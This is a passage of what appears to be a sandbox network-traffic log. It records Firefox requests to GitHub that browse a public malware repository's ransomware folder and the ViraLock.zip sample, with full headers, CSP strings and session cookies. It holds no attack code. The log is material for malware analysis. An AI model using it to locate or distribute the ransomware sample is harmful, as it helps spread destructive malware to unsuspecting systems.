productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          x-html-safe: 33e84c7bdcf00760a1e8e79a298b669303c5a66565534ab525c26b9ca425589f
                          x-github-request-id: C31B:3BC911:17B960:1BC559:6797C1D7
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/tree/master/ransomwares HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/html, application/xhtml+xml, application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          turbo-visit: true
                          x-react-app-name: repos-overview
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:47 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"2f35a548192aa4c7f03cb33866cc9d1e"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 845
                          x-github-request-id: C31B:3BC911:17B9C0:1BC5C4:6797C1D7
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/latest-commit/master/ransomwares HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:47 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"97528c517ff2a1874ec155f6281f47f6"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 441
                          x-github-request-id: C31B:3BC911:17B9C0:1BC5C3:6797C1D7
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/tree-commit-info/master/ransomwares
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/tree-commit-info/master/ransomwares HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:47 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"e61453a6d8b82727dfe87839b3fc469c"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 177
                          x-github-request-id: C31B:3BC911:17B9C0:1BC5C5:6797C1D7
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:57 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"ad81a67f0155a5645f764477853a8f31"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 1946
                          x-github-request-id: C31B:3BC911:17BF62:1BCC8E:6797C1D7
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          x-requested-with: XMLHttpRequest
                          x-github-target: dotcom
                          x-react-router: json
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:57 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"2687518353e369e3a4dc641a1de024f0"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 453
                          x-github-request-id: C31B:3BC911:17BF98:1BCCD5:6797C1E0
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares/ViraLock.zip
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/latest-commit/master/ransomwares/ViraLock.zip HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:57 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"e61453a6d8b82727dfe87839b3fc469c"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
